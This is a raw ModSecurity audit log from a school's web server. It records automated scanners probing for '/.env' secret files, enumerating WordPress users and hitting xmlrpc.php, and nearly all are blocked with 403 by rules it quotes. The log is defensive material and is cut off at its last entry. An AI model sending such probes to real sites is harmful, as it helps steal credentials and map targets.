GET /system/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--35e13616-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--35e13616-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924487312736 886 (- - -)
Stopwatch2: 1745924487312736 886; combined=377, p1=338, p2=0, p3=0, p4=0, p5=39, sr=137, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--35e13616-Z--
--f06e603a-A--
[29/Apr/2025:18:01:27 +0700] aBCxhxmWB8ZGI9fN-VFUIwAAAJE 103.236.140.4 34562 103.236.140.4 8181
--f06e603a-B--
GET /public/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--f06e603a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f06e603a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924487819153 849 (- - -)
Stopwatch2: 1745924487819153 849; combined=308, p1=273, p2=0, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f06e603a-Z--
--2b43f36e-A--
[29/Apr/2025:18:01:28 +0700] aBCxiBmWB8ZGI9fN-VFUJAAAAJI 103.236.140.4 34564 103.236.140.4 8181
--2b43f36e-B--
GET /shop/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.194
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--2b43f36e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2b43f36e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745924488167758 719 (- - -)
Stopwatch2: 1745924488167758 719; combined=264, p1=231, p2=0, p3=0, p4=0, p5=32, sr=67, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2b43f36e-Z--
--5f93b442-A--
[29/Apr/2025:21:17:11 +0700] aBDfZyUYsqS7mE9-0zow-wAAABc 103.236.140.4 52248 103.236.140.4 8181
--5f93b442-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 167.99.106.105
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 167.99.106.105
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--5f93b442-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5f93b442-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745936231653814 745 (- - -)
Stopwatch2: 1745936231653814 745; combined=300, p1=260, p2=0, p3=0, p4=0, p5=39, sr=73, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5f93b442-Z--
--37ee597a-A--
[29/Apr/2025:23:31:19 +0700] aBD-17M38gUEppT2vWNQ2gAAANY 103.236.140.4 60096 103.236.140.4 8181
--37ee597a-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.93.144
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.93.144
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--37ee597a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--37ee597a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745944279340268 4714 (- - -)
Stopwatch2: 1745944279340268 4714; combined=2408, p1=743, p2=1623, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--37ee597a-Z--
--1fe13175-A--
[29/Apr/2025:23:31:22 +0700] aBD-2p11ysLXBHLtLPWvaAAAAFc 103.236.140.4 60112 103.236.140.4 8181
--1fe13175-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.93.144
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.93.144
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--1fe13175-C--
demo.sayHello
--1fe13175-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1fe13175-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745944282609092 6813 (- - -)
Stopwatch2: 1745944282609092 6813; combined=4914, p1=656, p2=3998, p3=37, p4=41, p5=106, sr=81, sw=76, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1fe13175-Z--
--a9b8e31b-A--
[29/Apr/2025:23:57:09 +0700] aBEE5SUYsqS7mE9-0zo9oAAAABI 103.236.140.4 37820 103.236.140.4 8181
--a9b8e31b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.144
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.144
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko)
Accept-Charset: utf-8
--a9b8e31b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a9b8e31b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745945829773065 768 (- - -)
Stopwatch2: 1745945829773065 768; combined=326, p1=288, p2=0, p3=0, p4=0, p5=38, sr=91, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a9b8e31b-Z--
--b0f16720-A--
[30/Apr/2025:00:02:14 +0700] aBEGFhmWB8ZGI9fN-VFoygAAAJg 103.236.140.4 39056 103.236.140.4 8181
--b0f16720-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50
Accept-Charset: utf-8
--b0f16720-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b0f16720-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745946134946387 770 (- - -)
Stopwatch2: 1745946134946387 770; combined=325, p1=277, p2=0, p3=0, p4=0, p5=48, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b0f16720-Z--
--022b4874-A--
[30/Apr/2025:00:12:53 +0700] aBEIlbM38gUEppT2vWNTLgAAAMQ 103.236.140.4 41506 103.236.140.4 8181
--022b4874-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Accept-Charset: utf-8
--022b4874-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--022b4874-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745946773522955 894 (- - -)
Stopwatch2: 1745946773522955 894; combined=385, p1=338, p2=0, p3=0, p4=0, p5=46, sr=100, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--022b4874-Z--
--7db13f15-A--
[30/Apr/2025:00:59:02 +0700] aBETZhmWB8ZGI9fN-VFsFwAAAJA 103.236.140.4 52728 103.236.140.4 8181
--7db13f15-B--
GET /.env HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 206.189.95.232
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 206.189.95.232
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--7db13f15-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7db13f15-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745949542095073 911 (- - -)
Stopwatch2: 1745949542095073 911; combined=398, p1=360, p2=0, p3=0, p4=0, p5=38, sr=111, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7db13f15-Z--
--48e38007-A--
[30/Apr/2025:04:22:06 +0700] aBFC_tBN0baiHx4WjiZRMgAAAFU 103.236.140.4 53246 103.236.140.4 8181
--48e38007-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.192
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.192
X-Forwarded-Proto: https
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
--48e38007-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--48e38007-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745961726540722 2846 (- - -)
Stopwatch2: 1745961726540722 2846; combined=1458, p1=474, p2=943, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--48e38007-Z--
--5a1bb735-A--
[30/Apr/2025:04:48:54 +0700] aBFJRjsHLQ2TK6eM3eo3pAAAAII 103.236.140.4 59550 103.236.140.4 8181
--5a1bb735-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 137.184.203.63
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 137.184.203.63
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--5a1bb735-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5a1bb735-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745963334917434 781 (- - -)
Stopwatch2: 1745963334917434 781; combined=346, p1=310, p2=0, p3=0, p4=0, p5=36, sr=118, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5a1bb735-Z--
--03d29731-A--
[30/Apr/2025:04:54:44 +0700] aBFKpNBN0baiHx4WjiZTCwAAAEA 103.236.140.4 60922 103.236.140.4 8181
--03d29731-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept-Charset: utf-8
--03d29731-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--03d29731-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745963684435372 736 (- - -)
Stopwatch2: 1745963684435372 736; combined=295, p1=259, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--03d29731-Z--
--d0a99501-A--
[30/Apr/2025:04:56:30 +0700] aBFLDtBN0baiHx4WjiZTNgAAAEw 103.236.140.4 33104 103.236.140.4 8181
--d0a99501-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel 2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--d0a99501-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d0a99501-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745963790858590 840 (- - -)
Stopwatch2: 1745963790858590 840; combined=334, p1=294, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d0a99501-Z--
--95bfdc38-A--
[30/Apr/2025:05:15:13 +0700] aBFPcdBN0baiHx4WjiZUFAAAAEA 103.236.140.4 37432 103.236.140.4 8181
--95bfdc38-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; G8441) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 YaBrowser/19.1.3.198.00 Mobile Safari/537.36
Accept-Charset: utf-8
--95bfdc38-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--95bfdc38-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745964913052294 824 (- - -)
Stopwatch2: 1745964913052294 824; combined=335, p1=300, p2=0, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--95bfdc38-Z--
--a19fab66-A--
[30/Apr/2025:05:25:06 +0700] aBFRwj1td-6YjlnYDRJ66gAAABA 103.236.140.4 39738 103.236.140.4 8181
--a19fab66-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36
Accept-Charset: utf-8
--a19fab66-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a19fab66-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745965506076471 811 (- - -)
Stopwatch2: 1745965506076471 811; combined=338, p1=298, p2=0, p3=0, p4=0, p5=39, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a19fab66-Z--
--0bce174f-A--
[30/Apr/2025:06:57:49 +0700] aBFnfT1td-6YjlnYDRKAEwAAAAE 103.236.140.4 33142 103.236.140.4 8181
--0bce174f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Android; Mobile; rv:35.0) Gecko/35.0 Firefox/35.0
Accept-Charset: utf-8
--0bce174f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0bce174f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745971069223888 807 (- - -)
Stopwatch2: 1745971069223888 807; combined=307, p1=270, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0bce174f-Z--
--76372507-A--
[30/Apr/2025:06:59:37 +0700] aBFn6dmPDA_SdVd56wDv5QAAAM8 103.236.140.4 33564 103.236.140.4 8181
--76372507-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 6.0; NCE-AL00 Build/HUAWEINCE-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6904 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/4G Language/zh_CN
Accept-Charset: utf-8
--76372507-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--76372507-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745971177484070 13479 (- - -)
Stopwatch2: 1745971177484070 13479; combined=25487, p1=351, p2=0, p3=0, p4=0, p5=12586, sr=120, sw=0, l=0, gc=12550
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--76372507-Z--
--c9280108-A--
[30/Apr/2025:07:03:35 +0700] aBFo1zsHLQ2TK6eM3eo9rAAAAIE 103.236.140.4 34512 103.236.140.4 8181
--c9280108-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 OPR/62.0.3331.116
Accept-Charset: utf-8
--c9280108-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c9280108-H--
